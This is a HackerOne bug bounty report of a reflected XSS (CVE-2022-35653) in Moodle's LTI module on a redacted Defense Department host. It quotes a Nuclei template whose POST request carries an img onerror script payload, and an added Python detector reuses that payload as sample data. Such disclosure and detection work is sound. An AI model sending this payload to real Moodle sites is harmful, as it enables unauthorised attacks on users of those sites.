hackerone | Maskedpersian | H1:2444032
History: Apr 02, 2024 - 12:06 a.m.

U.S. Dept Of Defense: Reflected XSS via Moodle on ███ [CVE-2022-35653]

2024-04-02 00:06:09
maskedpersian
hackerone.com
cve2022
moodle
xss
vulnerability
mitigation
remote attacker
web security

6 Medium

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.8%

Hi Security Team
I found an XSS vulnerability on your website [CVE-2022-35653]
Reference: https://vulners.com/nuclei/NUCLEI:CVE-2022-35653
If you wanna test this:

id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.00815
    epss-percentile: 0.79909
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query: title:"Moodle"
  tags: cve,cve2022,moodle,xss

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

Impact

If successful, a cross-site scripting attack can severely impact websites and web applications, damage their reputation and relationships with customers. XSS can deface websites, can result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

System Host(s)

█████████

Affected Product(s) and Version(s)

CVE Numbers

Steps to Reproduce

https://vulners.com/nuclei/NUCLEI:CVE-2022-35653

Suggested Mitigation/Remediation Actions
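
An added example, not part of the original report or of Moodle's code: the template above carries its markup in the form-field name rather than the value, so this sketch flags logged POST bodies to /mod/lti/auth.php whose decoded field names contain HTML metacharacters, and shows the name being HTML-escaped before it is written back. The request tuples, client addresses and the `render_hidden_field` helper are constructed for illustration.

```python
import html
from urllib.parse import parse_qsl

# Characters that can close an attribute or open a tag once reflected.
HTML_META = set("<>\"'`")

def suspicious_param_names(body):
    """Return percent-decoded form-field names containing HTML metacharacters."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return [name for name, _ in pairs if HTML_META & set(name)]

def scan(requests):
    """Yield (client, names) for POSTs to the LTI auth endpoint with such names."""
    for client, method, path, body in requests:
        if method == "POST" and path.split("?", 1)[0] == "/mod/lti/auth.php":
            names = suspicious_param_names(body)
            if names:
                yield client, names

def render_hidden_field(name, value):
    """Hypothetical output helper: escape the field name as well as the value."""
    return '<input type="hidden" name="{}" value="{}">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True))

# Constructed sample: the template's request body plus two ordinary requests.
SAMPLE = [
    ("198.51.100.7", "POST", "/mod/lti/auth.php",
     "xxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1"),
    ("203.0.113.9", "POST", "/mod/lti/auth.php",
     "client_id=abc123&login_hint=42&scope=openid"),
    ("203.0.113.9", "POST", "/login/index.php", "username=a&password=b"),
]

if __name__ == "__main__":
    for client, names in scan(SAMPLE):
        print("flag", client, names)
        print("escaped:", render_hidden_field(names[0], "1"))
```

The scan needs request bodies to be available, for example from a reverse proxy or WAF that logs them; access logs that record only the URL will not show this pattern.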
